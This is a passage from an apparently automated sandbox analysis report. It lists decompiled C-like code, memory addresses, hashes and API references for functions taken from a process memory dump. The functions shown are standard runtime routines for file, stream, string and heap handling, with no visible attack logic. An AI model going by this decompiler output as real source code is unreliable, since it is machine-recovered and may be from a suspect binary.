                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Exception@8H_prolog3Throw
                    • String ID:
                    • API String ID: 3670251406-0
                    • Opcode ID: d5531fd5e1a534bdd2488dd43ba186cd6607e8d38588fad51826add332a3168d
                    • Instruction ID: 72ca2f36314519fa766c4b441226a9ad267afee5536644d264f49043f48afcf0
                    • Opcode Fuzzy Hash: d5531fd5e1a534bdd2488dd43ba186cd6607e8d38588fad51826add332a3168d
                    • Instruction Fuzzy Hash: 1E314374600200DFDB24CF6DC894E6ABBF5BF98618B24849DE84A9B262C732ED01CF10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 88%
                    			E013FE183() {
                    				signed int _t29;
                    				signed int _t33;
                    				void* _t34;
                    				void* _t48;
                    				signed int _t53;
                    				intOrPtr _t56;
                    				void* _t57;
                    
                    				E013F3660(0x1433928, 0xc);
                    				_t56 =  *((intOrPtr*)(_t57 + 0xc));
                    				if((0 | _t56 != 0x00000000) != 0) {
                    					 *(_t57 - 0x1c) =  *(_t57 - 0x1c) & 0x00000000;
                    					E013FDCBC(_t56);
                    					 *(_t57 - 4) =  *(_t57 - 4) & 0x00000000;
                    					if(( *(_t56 + 0xc) >> 0x0000000c & 0x00000001) != 0) {
                    						L14:
                    						_t29 = E013FE15A( *((intOrPtr*)(_t57 + 8)), _t56); // executed
                    						 *(_t57 - 0x1c) = _t29;
                    						 *(_t57 - 4) = 0xfffffffe;
                    						E013FE27F(_t56);
                    					} else {
                    						_t33 = E01407888(_t56);
                    						_t53 = _t33;
                    						if(_t53 == 0xffffffff || _t53 == 0xfffffffe) {
                    							_t48 = 0x14353a8;
                    							_t34 = 0x14353a8;
                    						} else {
                    							_t34 = (_t33 & 0x0000003f) * 0x30 +  *((intOrPtr*)(0x143a740 + (_t53 >> 6) * 4));
                    							_t48 = 0x14353a8;
                    						}
                    						if( *((char*)(_t34 + 0x29)) != 0) {
                    							L13:
                    							 *((intOrPtr*)(E013FDB3A())) = 0x16;
                    							E013FDA61();
                    							E013FD560(_t57, 0x1435234, _t57 - 0x10, 0xfffffffe);
                    							goto L2;
                    						} else {
                    							if(_t53 != 0xffffffff && _t53 != 0xfffffffe) {
                    								_t48 = (_t53 & 0x0000003f) * 0x30 +  *((intOrPtr*)(0x143a740 + (_t53 >> 6) * 4));
                    							}
                    							if(( *(_t48 + 0x2d) & 0x00000001) == 0) {
                    								goto L14;
                    							} else {
                    								goto L13;
                    							}
                    						}
                    					}
                    				} else {
                    					 *((intOrPtr*)(E013FDB3A())) = 0x16;
                    					E013FDA61();
                    					L2:
                    				}
                    				return E013F36A6();
                    			}










                    0x013fe18a
                    0x013fe191
                    0x013fe19b
                    0x013fe1b5
                    0x013fe1ba
                    0x013fe1c0
                    0x013fe1cc
                    0x013fe255
                    0x013fe259
                    0x013fe262
                    0x013fe265
                    0x013fe26c
                    0x013fe1d2
                    0x013fe1d3
                    0x013fe1d9
                    0x013fe1de
                    0x013fe1fe
                    0x013fe203
                    0x013fe1e5
                    0x013fe1f0
                    0x013fe1f7
                    0x013fe1f7
                    0x013fe209
                    0x013fe22d
                    0x013fe232
                    0x013fe238
                    0x013fe248
                    0x00000000
                    0x013fe20b
                    0x013fe20e
                    0x013fe220
                    0x013fe220
                    0x013fe22b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013fe22b
                    0x013fe209
                    0x013fe19d
                    0x013fe1a2
                    0x013fe1a8
                    0x013fe1ad
                    0x013fe1ad
                    0x013fe278

                    APIs
                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 013FE248
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: CallFilterFunc@8
                    • String ID:
                    • API String ID: 4062629308-0
                    • Opcode ID: 600fc02219b0d1b86cc2015785a61d6de67cc76c39f33e3737037d65276d5cdb
                    • Instruction ID: f54f282371a348e1e9f4007c1b81e41670d5cde38eb67afe765f173d104e5288
                    • Opcode Fuzzy Hash: 600fc02219b0d1b86cc2015785a61d6de67cc76c39f33e3737037d65276d5cdb
                    • Instruction Fuzzy Hash: AD212935A54209AEEB197B7CDC0476E3795AFA523CF25432ED7318E2F0EB7495028601
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E013C74F4(intOrPtr* __ecx) {
                    				char _t38;
                    				void* _t52;
                    				intOrPtr* _t56;
                    				intOrPtr* _t57;
                    				void* _t60;
                    				intOrPtr* _t61;
                    				void* _t63;
                    				intOrPtr _t67;
                    				intOrPtr* _t69;
                    				void* _t70;
                    				intOrPtr _t73;
                    
                    				_t56 = __ecx;
                    				_push(0x14);
                    				E013F272D(E01415E83);
                    				_t69 = _t56;
                    				 *((intOrPtr*)(_t70 - 0x14)) = _t69;
                    				 *((intOrPtr*)(_t70 - 0x20)) = _t69;
                    				 *((intOrPtr*)(_t69 + 8)) = 0;
                    				 *((intOrPtr*)(_t69 + 0xc)) = 0;
                    				_t57 =  *((intOrPtr*)( *((intOrPtr*)( *_t69 + 4)) + _t69 + 0x38));
                    				if(_t57 != 0) {
                    					 *((intOrPtr*)( *_t57 + 4))();
                    				}
                    				 *((intOrPtr*)(_t70 - 4)) = 0;
                    				_t38 = E013C5E97(_t69, _t63, 1);
                    				 *((char*)(_t70 - 0x1c)) = _t38;
                    				 *((intOrPtr*)(_t70 - 4)) = 1;
                    				if(_t38 != 0) {
                    					_t73 =  *((intOrPtr*)(_t70 + 0x10));
                    					if(_t73 >= 0) {
                    						_t67 =  *((intOrPtr*)(_t70 + 0xc));
                    						if(_t73 > 0 || _t67 > 0) {
                    							 *((char*)(_t70 - 4)) = 2;
                    							_t52 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t69 + 4)) + _t69 + 0x38)))) + 0x20))( *((intOrPtr*)(_t70 + 8)), _t67,  *((intOrPtr*)(_t70 + 0x10)));
                    							 *((intOrPtr*)(_t69 + 8)) =  *((intOrPtr*)(_t69 + 8)) + _t52;
                    							asm("adc [esi+0xc], edx");
                    							if(_t52 !=  *((intOrPtr*)(_t70 + 0xc)) || _t67 !=  *((intOrPtr*)(_t70 + 0x10))) {
                    								_push(3);
                    								_pop(0);
                    							}
                    							 *((intOrPtr*)(_t70 - 4)) = 1;
                    						}
                    					}
                    				}
                    				_t60 =  *((intOrPtr*)( *_t69 + 4)) + _t69;
                    				if(0 != 0) {
                    					_t66 =  ==  ?  *(_t60 + 0xc) | 0x00000004 :  *(_t60 + 0xc);
                    					E013C6548(_t60,  ==  ?  *(_t60 + 0xc) | 0x00000004 :  *(_t60 + 0xc),  ==  ?  *(_t60 + 0xc) | 0x00000004 :  *(_t60 + 0xc), 0);
                    				}
                    				 *((intOrPtr*)(_t70 - 4)) = 4;
                    				_t61 =  *((intOrPtr*)( *((intOrPtr*)( *_t69 + 4)) + _t69 + 0x38));
                    				if(_t61 != 0) {
                    					 *((intOrPtr*)( *_t61 + 8))();
                    				}
                    				return E013F269C(_t69);
                    			}














                    0x013c74f4
                    0x013c74f4
                    0x013c74fb
                    0x013c7500
                    0x013c7502
                    0x013c7507
                    0x013c750a
                    0x013c750f
                    0x013c7517
                    0x013c751d
                    0x013c7521
                    0x013c7521
                    0x013c7528
                    0x013c752b
                    0x013c7530
                    0x013c7533
                    0x013c753c
                    0x013c753e
                    0x013c7541
                    0x013c7543
                    0x013c7546
                    0x013c7551
                    0x013c7562
                    0x013c7565
                    0x013c7568
                    0x013c756e
                    0x013c7575
                    0x013c7577
                    0x013c7577
                    0x013c7578
                    0x013c7578
                    0x013c7546
                    0x013c7541
                    0x013c7584
                    0x013c7588
                    0x013c7598
                    0x013c759c
                    0x013c759c
                    0x013c75a3
                    0x013c75ad
                    0x013c75b3
                    0x013c75b7
                    0x013c75b7
                    0x013c75c1

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: H_prolog3_catch
                    • String ID:
                    • API String ID: 3886170330-0
                    • Opcode ID: 007ef013e26b6e1d6922dc013891cb053967f15edb2e65dd8caa960287323900
                    • Instruction ID: ba939e977cb2e18b875a16f4e74be1291c39daba120a07ceef50e9996db7d677
                    • Opcode Fuzzy Hash: 007ef013e26b6e1d6922dc013891cb053967f15edb2e65dd8caa960287323900
                    • Instruction Fuzzy Hash: 9A312774A00285DFDB20CF59C584AA9BBF1BFA8718F24C49DE9458B261C771ED41CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E013FDFFD() {
                    				signed int _t29;
                    				signed int _t33;
                    				void* _t34;
                    				void* _t47;
                    				signed int _t52;
                    				intOrPtr _t54;
                    				void* _t56;
                    
                    				E013F3660(0x1433908, 0x10);
                    				_t54 =  *((intOrPtr*)(_t56 + 8));
                    				 *((intOrPtr*)(_t56 - 0x20)) = _t54;
                    				if((0 | _t54 != 0x00000000) != 0) {
                    					 *(_t56 - 0x1c) =  *(_t56 - 0x1c) & 0x00000000;
                    					E013FDCBC(_t54);
                    					 *(_t56 - 4) =  *(_t56 - 4) & 0x00000000;
                    					if(( *(_t54 + 0xc) >> 0x0000000c & 0x00000001) != 0) {
                    						L14:
                    						_t29 = E013FDFC1(_t54); // executed
                    						 *(_t56 - 0x1c) = _t29;
                    						 *(_t56 - 4) = 0xfffffffe;
                    						E013FE0F5();
                    					} else {
                    						_t33 = E01407888(_t54);
                    						_t52 = _t33;
                    						if(_t52 == 0xffffffff || _t52 == 0xfffffffe) {
                    							_t47 = 0x14353a8;
                    							_t34 = 0x14353a8;
                    						} else {
                    							_t34 = (_t33 & 0x0000003f) * 0x30 +  *((intOrPtr*)(0x143a740 + (_t52 >> 6) * 4));
                    							_t47 = 0x14353a8;
                    						}
                    						if( *((char*)(_t34 + 0x29)) != 0) {
                    							L13:
                    							 *((intOrPtr*)(E013FDB3A())) = 0x16;
                    							E013FDA61();
                    							E013FD560(_t56, 0x1435234, _t56 - 0x10, 0xfffffffe);
                    							goto L2;
                    						} else {
                    							if(_t52 != 0xffffffff && _t52 != 0xfffffffe) {
                    								_t47 = (_t52 & 0x0000003f) * 0x30 +  *((intOrPtr*)(0x143a740 + (_t52 >> 6) * 4));
                    							}
                    							if(( *(_t47 + 0x2d) & 0x00000001) == 0) {
                    								goto L14;
                    							} else {
                    								goto L13;
                    							}
                    						}
                    					}
                    				} else {
                    					 *((intOrPtr*)(E013FDB3A())) = 0x16;
                    					E013FDA61();
                    					L2:
                    				}
                    				return E013F36A6();
                    			}










                    0x013fe004
                    0x013fe009
                    0x013fe00c
                    0x013fe018
                    0x013fe032
                    0x013fe037
                    0x013fe03d
                    0x013fe049
                    0x013fe0d2
                    0x013fe0d3
                    0x013fe0db
                    0x013fe0de
                    0x013fe0e5
                    0x013fe04f
                    0x013fe050
                    0x013fe056
                    0x013fe05b
                    0x013fe07b
                    0x013fe080
                    0x013fe062
                    0x013fe06d
                    0x013fe074
                    0x013fe074
                    0x013fe086
                    0x013fe0aa
                    0x013fe0af
                    0x013fe0b5
                    0x013fe0c5
                    0x00000000
                    0x013fe088
                    0x013fe08b
                    0x013fe09d
                    0x013fe09d
                    0x013fe0a8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013fe0a8
                    0x013fe086
                    0x013fe01a
                    0x013fe01f
                    0x013fe025
                    0x013fe02a
                    0x013fe02a
                    0x013fe0f1

                    APIs
                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 013FE0C5
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: CallFilterFunc@8
                    • String ID:
                    • API String ID: 4062629308-0
                    • Opcode ID: 5c41925958f0bdc93d3d29517acc5a4d947d28ebe073c974a7dd0105985868e5
                    • Instruction ID: 6cffa6f6b407e598d06e8f197b63ccb97c62cb2e527f0f5363f84a2c9d3d6cb9
                    • Opcode Fuzzy Hash: 5c41925958f0bdc93d3d29517acc5a4d947d28ebe073c974a7dd0105985868e5
                    • Instruction Fuzzy Hash: 96212631A1021B86DB196B7D8C0436E3651AF9533CF25433DE7229F2F0DB7886078742
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 96%
                    			E013C5927(unsigned int __ebx, signed int* __ecx) {
                    				signed int _t29;
                    				void* _t33;
                    				unsigned int _t35;
                    				signed int _t36;
                    				signed int* _t37;
                    				unsigned int _t39;
                    				signed int _t41;
                    				signed int _t45;
                    				signed int* _t46;
                    				void* _t47;
                    
                    				_t37 = __ecx;
                    				_t35 = __ebx;
                    				_push(0xc);
                    				E013F272D(E01415C35);
                    				_t46 = _t37;
                    				 *(_t47 - 0x18) = _t46;
                    				_t45 =  *(_t47 + 8) | 0x0000000f;
                    				if(_t45 <= 0xfffffffe) {
                    					 *(_t47 - 0x14) = 3;
                    					_t35 = _t46[5];
                    					_t39 = _t35 >> 1;
                    					if(_t39 > _t45 /  *(_t47 - 0x14)) {
                    						_t33 = 0xfffffffe;
                    						if(_t35 > _t33 - _t39) {
                    							_t45 = 0xfffffffe;
                    						} else {
                    							_t45 = _t39 + _t35;
                    						}
                    					}
                    				} else {
                    					_t45 =  *(_t47 + 8);
                    				}
                    				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
                    				_t15 = _t45 + 1; // 0xff
                    				_t29 = E013C57A6(_t35, _t15, 1, 1); // executed
                    				_t36 =  *(_t47 + 0xc);
                    				 *(_t47 - 0x14) = _t29;
                    				if(_t36 != 0) {
                    					if(_t46[5] < 0x10) {
                    						_t41 = _t46;
                    					} else {
                    						_t41 =  *_t46;
                    					}
                    					if(_t36 != 0) {
                    						E013F5310(_t29, _t41, _t36);
                    					}
                    				}
                    				_t30 = E013C6118(_t46, 1, 0);
                    				if(_t46 != 0) {
                    					_t30 =  *(_t47 - 0x14);
                    					 *_t46 =  *(_t47 - 0x14);
                    				}
                    				_t46[5] = _t45;
                    				_t46[4] = _t36;
                    				if(_t46[5] >= 0x10) {
                    					_t46 =  *_t46;
                    				}
                    				 *((char*)(_t46 + _t36)) = 0;
                    				return E013F269C(_t30);
                    			}













                    0x013c5927
                    0x013c5927
                    0x013c5927
                    0x013c592e
                    0x013c5933
                    0x013c5935
                    0x013c593b
                    0x013c5941
                    0x013c594a
                    0x013c5953
                    0x013c595b
                    0x013c595f
                    0x013c5963
                    0x013c5968
                    0x013c5971
                    0x013c596a
                    0x013c596a
                    0x013c596a
                    0x013c5968
                    0x013c5943
                    0x013c5943
                    0x013c5943
                    0x013c5972
                    0x013c5976
                    0x013c597e
                    0x013c59b5
                    0x013c59b8
                    0x013c59bd
                    0x013c59c3
                    0x013c59c9
                    0x013c59c5
                    0x013c59c5
                    0x013c59c5
                    0x013c59cd
                    0x013c59d2
                    0x013c59d7
                    0x013c59cd
                    0x013c59e0
                    0x013c59e7
                    0x013c59e9
                    0x013c59ec
                    0x013c59ec
                    0x013c59ee
                    0x013c59f5
                    0x013c59f8
                    0x013c59fa
                    0x013c59fa
                    0x013c59fc
                    0x013c5a05

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: H_prolog3_catch
                    • String ID:
                    • API String ID: 3886170330-0
                    • Opcode ID: c593e5c6d5b910b1817840aa0b61344233f13ca06e22a458e22bbdfbe276b026
                    • Instruction ID: b6d6a5b79af37df8c1e526ace20f6f47625489593232159e177cd5a9c542dccd
                    • Opcode Fuzzy Hash: c593e5c6d5b910b1817840aa0b61344233f13ca06e22a458e22bbdfbe276b026
                    • Instruction Fuzzy Hash: 28210871B15306DBEB20CF5CC8807AEB7B5AB56B38F10065DD6926B2C0DBB0BD448792
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 61%
                    			E013C853F(intOrPtr* __ecx, void* __eflags) {
                    				void* _t34;
                    				intOrPtr* _t36;
                    				void* _t39;
                    				intOrPtr _t45;
                    				intOrPtr* _t46;
                    				void* _t48;
                    
                    				_t36 = __ecx;
                    				_push(0x14);
                    				E013F272D(E0141603E);
                    				_t46 = _t36;
                    				 *((intOrPtr*)(_t48 - 0x14)) = _t46;
                    				_push(_t46);
                    				E013C380D(_t48 - 0x20);
                    				 *((intOrPtr*)(_t48 - 4)) = 0;
                    				if( *((char*)(_t48 - 0x1c)) != 0) {
                    					__eflags =  *((intOrPtr*)(_t48 + 0x10));
                    					if(__eflags >= 0) {
                    						_t45 =  *((intOrPtr*)(_t48 + 0xc));
                    						if(__eflags > 0) {
                    							L8:
                    							 *((char*)(_t48 - 4)) = 1;
                    							_t34 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t46 + 4)) + _t46 + 0x38)))) + 0x24))( *((intOrPtr*)(_t48 + 8)), _t45,  *((intOrPtr*)(_t48 + 0x10)));
                    							__eflags = _t34 -  *((intOrPtr*)(_t48 + 0xc));
                    							if(_t34 !=  *((intOrPtr*)(_t48 + 0xc))) {
                    								L10:
                    								_push(4);
                    								_pop(0);
                    							} else {
                    								__eflags = _t45 -  *((intOrPtr*)(_t48 + 0x10));
                    								if(_t45 !=  *((intOrPtr*)(_t48 + 0x10))) {
                    									goto L10;
                    								}
                    							}
                    							 *((intOrPtr*)(_t48 - 4)) = 0;
                    						} else {
                    							__eflags = _t45;
                    							if(_t45 > 0) {
                    								goto L8;
                    							}
                    						}
                    					}
                    				} else {
                    					_push(4);
                    					_pop(0);
                    				}
                    				_t39 =  *((intOrPtr*)( *_t46 + 4)) + _t46;
                    				if(0 != 0) {
                    					_t44 =  ==  ?  *(_t39 + 0xc) | 0x00000004 :  *(_t39 + 0xc);
                    					E013C6548(_t39,  ==  ?  *(_t39 + 0xc) | 0x00000004 :  *(_t39 + 0xc),  ==  ?  *(_t39 + 0xc) | 0x00000004 :  *(_t39 + 0xc), 0);
                    				}
                    				E013C3EFD(_t48 - 0x20);
                    				return E013F269C(_t46);
                    			}









                    0x013c853f
                    0x013c853f
                    0x013c8546
                    0x013c854b
                    0x013c854d
                    0x013c8555
                    0x013c8558
                    0x013c8561
                    0x013c8564
                    0x013c859d
                    0x013c85a0
                    0x013c85a2
                    0x013c85a5
                    0x013c85ab
                    0x013c85b0
                    0x013c85c1
                    0x013c85c4
                    0x013c85c7
                    0x013c85ce
                    0x013c85ce
                    0x013c85d0
                    0x013c85c9
                    0x013c85c9
                    0x013c85cc
                    0x00000000
                    0x00000000
                    0x013c85cc
                    0x013c85d1
                    0x013c85a7
                    0x013c85a7
                    0x013c85a9
                    0x00000000
                    0x00000000
                    0x013c85a9
                    0x013c85a5
                    0x013c8566
                    0x013c8566
                    0x013c8568
                    0x013c8568
                    0x013c856e
                    0x013c8572
                    0x013c8582
                    0x013c8586
                    0x013c8586
                    0x013c858e
                    0x013c859a

                    APIs
                    • __EH_prolog3_catch.LIBCMT ref: 013C8546
                      • Part of subcall function 013C380D: __EH_prolog3.LIBCMT ref: 013C3814
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: H_prolog3H_prolog3_catch
                    • String ID:
                    • API String ID: 1882928916-0
                    • Opcode ID: 1c37700e7b1dc4fb43a168095650d936f06599dc2ea9329a735bdb3c7c07c1ce
                    • Instruction ID: 842ff987243862e290c2bc4dccd8c39de96c567ba91ddcb6b69cb3ba7ffa0b31
                    • Opcode Fuzzy Hash: 1c37700e7b1dc4fb43a168095650d936f06599dc2ea9329a735bdb3c7c07c1ce
                    • Instruction Fuzzy Hash: 2F115EB1A00205EFDB11CF59C980AAEBBB1BF68B18F14809EF6055B255C7B1DE41CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 72%
                    			E0140A039(void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed short* _a8, intOrPtr _a12, intOrPtr* _a16) {
                    				char _v8;
                    				char _v12;
                    				void* _v16;
                    				intOrPtr _v20;
                    				char _v32;
                    				void* _t25;
                    
                    				E01409DF5( &_v32, _a8);
                    				asm("movsd");
                    				asm("movsd");
                    				asm("movsd");
                    				if(_v12 != 0) {
                    					_t25 = E0141201B( &_v8, _a4, _v20, _a12, 0x180); // executed
                    					if(_t25 != 0) {
                    						goto L1;
                    					}
                    					 *0x143a39c =  *0x143a39c + 1;
                    					asm("lock or [eax], ecx");
                    					 *((intOrPtr*)(_a16 + 8)) = 0;
                    					 *((intOrPtr*)(_a16 + 0x1c)) = 0;
                    					 *((intOrPtr*)(_a16 + 4)) = 0;
                    					 *_a16 = 0;
                    					 *((intOrPtr*)(_a16 + 0x10)) = _v8;
                    					return _a16;
                    				}
                    				L1:
                    				return 0;
                    			}









                    0x0140a04a
                    0x0140a056
                    0x0140a057
                    0x0140a058
                    0x0140a05f
                    0x0140a077
                    0x0140a081
                    0x00000000
                    0x00000000
                    0x0140a086
                    0x0140a092
                    0x0140a09a
                    0x0140a0a0
                    0x0140a0a6
                    0x0140a0ac
                    0x0140a0b4
                    0x00000000
                    0x0140a0b7
                    0x0140a061
                    0x00000000

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: __wsopen_s
                    • String ID:
                    • API String ID: 3347428461-0
                    • Opcode ID: 77aba2f8a017cb0816ef7870424a96cdc15c9ca8259a136a4d1503109ee6654b
                    • Instruction ID: 41bf1e61945827a808569f6888e3b4991cac62adc88488e6532d7133f0e7f9d4
                    • Opcode Fuzzy Hash: 77aba2f8a017cb0816ef7870424a96cdc15c9ca8259a136a4d1503109ee6654b
                    • Instruction Fuzzy Hash: CE1148B190420AAFCB06DF59E94099B7BF5EF48304F10406AF808AB351D631E911CB65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E0140D9CC(void* __esi, void* __eflags) {
                    				intOrPtr _v12;
                    				void* __ecx;
                    				char _t16;
                    				void* _t17;
                    				void* _t26;
                    				void* _t28;
                    				void* _t30;
                    				char _t31;
                    				void* _t33;
                    				intOrPtr* _t35;
                    
                    				_push(_t26);
                    				_push(_t26);
                    				_t16 = E014009B2(_t26, 0x40, 0x30); // executed
                    				_t31 = _t16;
                    				_v12 = _t31;
                    				_t28 = _t30;
                    				if(_t31 != 0) {
                    					_t2 = _t31 + 0xc00; // 0xc00
                    					_t17 = _t2;
                    					__eflags = _t31 - _t17;
                    					if(__eflags != 0) {
                    						_t3 = _t31 + 0x20; // 0x20
                    						_t35 = _t3;
                    						_t33 = _t17;
                    						do {
                    							_t4 = _t35 - 0x20; // 0x0
                    							E014070F5(_t28, __eflags, _t4, 0xfa0, 0);
                    							 *(_t35 - 8) =  *(_t35 - 8) | 0xffffffff;
                    							 *_t35 = 0;
                    							_t35 = _t35 + 0x30;
                    							 *((intOrPtr*)(_t35 - 0x2c)) = 0;
                    							 *((intOrPtr*)(_t35 - 0x28)) = 0xa0a0000;
                    							 *((char*)(_t35 - 0x24)) = 0xa;
                    							 *(_t35 - 0x23) =  *(_t35 - 0x23) & 0x000000f8;
                    							 *((char*)(_t35 - 0x22)) = 0;
                    							__eflags = _t35 - 0x20 - _t33;
                    						} while (__eflags != 0);
                    						_t31 = _v12;
                    					}
                    				} else {
                    					_t31 = 0;
                    				}
                    				E014012E1(0);
                    				return _t31;
                    			}













                    0x0140d9d1
                    0x0140d9d2
                    0x0140d9d9
                    0x0140d9de
                    0x0140d9e2
                    0x0140d9e6
                    0x0140d9e9
                    0x0140d9ef
                    0x0140d9ef
                    0x0140d9f5
                    0x0140d9f7
                    0x0140d9fa
                    0x0140d9fa
                    0x0140d9fd
                    0x0140d9ff
                    0x0140da05
                    0x0140da09
                    0x0140da0e
                    0x0140da12
                    0x0140da14
                    0x0140da17
                    0x0140da1d
                    0x0140da24
                    0x0140da28
                    0x0140da2c
                    0x0140da2f
                    0x0140da2f
                    0x0140da33
                    0x0140da36
                    0x0140d9eb
                    0x0140d9eb
                    0x0140d9eb
                    0x0140da38
                    0x0140da45

                    APIs
                      • Part of subcall function 014009B2: HeapAlloc.KERNEL32(00000008,?,00000000,?,01406AB6,00000001,00000364,?,?,?,013FDB3F,013FF169,?,?,013C957D,?), ref: 014009F3
                    • _free.LIBCMT ref: 0140DA38
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: AllocHeap_free
                    • String ID:
                    • API String ID: 1080816511-0
